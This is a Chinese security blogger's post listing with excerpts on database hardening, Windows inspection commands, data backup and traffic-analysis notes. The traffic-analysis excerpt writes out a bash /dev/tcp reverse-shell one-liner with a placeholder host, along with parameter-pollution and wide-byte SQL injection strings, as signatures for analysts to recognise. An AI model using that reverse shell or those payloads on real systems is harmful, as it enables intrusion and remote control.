- 博客(7)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 安全加固文
数据库相关的shell操作命令都会分别记录在.bash_history,如果这些文件不慎被读取,会导致数据库密码和数据库结构等信息泄露,而登陆数据库后的操作将记录在.mysql_history文件中,如果使用update表信息来修改数据库用户密码的话,也会被读取密码,因此需要删除这两个文件,同时在进行登陆或备份数据库等与密码相关操作时,应该使用-p参数加入提示输入密码后,隐式输入密码,建议将以上文件置空。我们可以使用日志系统所记录的信息为系统进行排错,优化系统的性能,或者根据这些信息调整系统的行为。
2023-07-07 01:05:26
63
1
原创 安全巡检文
每个环境都将包含一些你需要内置的应用程序,包括游戏、 web 浏览器、配置工具、文件管理器、负责您的系统或任何台式机、笔记本电脑或服务器中,都有硬件设备,如 CD 读取器、 USB 端口、HDMI 端口、局域网端口和内存卡读取器。如记事本、画图、微软 Office、媒体播放器、 Windows 浏览器、 Web 浏览器、 PowerPoint 等。负责资源管理(要使用多少 RAM,要给多少内存,在硬盘上哪里写,如何处理多个用户请求,为特定目的激活哪个设备)内核是操作系统的底层。内核负责与硬件和软件的通信。
2023-07-07 01:05:25
32
1
原创 流量分析碎片
login_id=15&login_id=16,面对客户端传递两个相同的参数,服务器端可能会这样处理:验证第一个login_id的值-15,而取第二个login_id的值-16。id=1%df’(浏览器解析时进行url编码%27)->%df%27。解析时先变utf-8编码,在gbk触发:(%e5%5c转为UTF-8为e9%8c%a6)bash -c bash -i >& /dev/tcp/ip/端口 0>&1。
2023-07-07 01:03:17
38
1
原创 windows安全巡检
运行-%UserProfile%\Recent—-最近打开文件。schtasks.exe—-查看计划任务。lusrmgr.msc—-本地用户查看。eventvwr.msc—-时间查看器。services.msc—-服务启动。gpedit.msc—-组策略命令。自定义一个策略,用习惯后,都不更改。msconfig—系统配置查看命令。systeminfo——系统信息。1.允许运行的软件—异常自启动。2. 允许的exe—异常自启动。regedit—-注册表命令。tasklist—端口。
2023-07-07 01:02:04
144
1
原创 数据安全备份
( ̀⌄ ́)可是还是有免杀啊,若想要保证文件扫描后还有安全隐患,要如何处理?iphone—2台【工作、个人(个人证件锁死、从不联网操作、归档到目的地)】5.banzip解压文件密码(windows,mac(keka))文件中转:经货163转发—杀毒软件过滤—断网记录到u盘。7.encrypto加密软件windows、mac。核心思想:用户权限、文件权限、加密解密、安全意识。云储存—百度账号、阿里云盘、github仓库。电脑—1台【建议2台、联网与不联网】2.操作系统的账号分配、文件权限。
2023-07-07 01:00:24
55
1
原创 0-101-
明确目标,坚持到底,了解自己,隔离网络,每日三省。个人:写报告,管理能力,专注力,毅力。在基础上要学会一门语言;移动端poc,pcpoc。
2023-07-07 00:56:29
26
1
原创 入职事项点
注意⚠️:网段,权限,细分模块工作内容。2.积极汇报进度(时间/周月报)3.源—目的—所需资料—联系人。----内网资源ip和域名。---日志从那些设备汇聚。—-开通ssl、白名单。常访问的白名单及网段。---日志查询,告警。
2023-07-07 00:54:35
23
2
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人